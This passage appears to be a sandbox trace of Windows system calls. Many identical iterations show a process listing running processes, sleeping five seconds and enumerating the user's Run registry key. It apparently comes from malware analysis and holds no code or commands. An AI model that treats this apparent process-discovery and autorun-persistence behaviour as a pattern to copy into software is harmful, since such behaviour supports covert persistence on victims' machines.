(ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.375] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.378] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.379] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.382] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.383] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.383] NtClose (Handle=0x274) returned 0x0 [0176.383] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.385] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.385] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.386] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.391] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.394] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.395] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.395] NtClose (Handle=0x274) returned 0x0 [0176.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.402] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.407] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.408] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.408] NtClose (Handle=0x274) returned 0x0 [0176.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.410] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.411] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.462] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.466] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.467] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.467] NtClose (Handle=0x274) returned 0x0 [0176.467] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.471] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.472] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.475] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.476] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.478] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.478] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.478] NtClose (Handle=0x274) returned 0x0 [0176.479] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.480] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.481] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.485] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.488] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.491] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.492] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.492] NtClose (Handle=0x274) returned 0x0 [0176.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.495] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.498] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.499] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.502] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.504] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.504] NtClose (Handle=0x274) returned 0x0 [0176.504] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.506] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.507] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.511] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.513] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.514] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.514] NtClose (Handle=0x274) returned 0x0 [0176.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.516] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.516] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.520] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.525] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.531] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.532] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.532] NtClose (Handle=0x274) returned 0x0 [0176.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.535] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.535] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.540] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.541] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.542] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.542] NtClose (Handle=0x274) returned 0x0 [0176.542] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.551] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.552] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.555] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.556] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.556] NtClose (Handle=0x274) returned 0x0 [0176.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.559] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.562] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.563] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.565] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.566] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.566] NtClose (Handle=0x274) returned 0x0 [0176.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.572] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.573] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0176.577] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0176.578] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0176.578] NtClose (Handle=0x274) returned 0x0 [0176.578] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0176.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0176.580] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0176.580] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0176.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0176.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.585] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 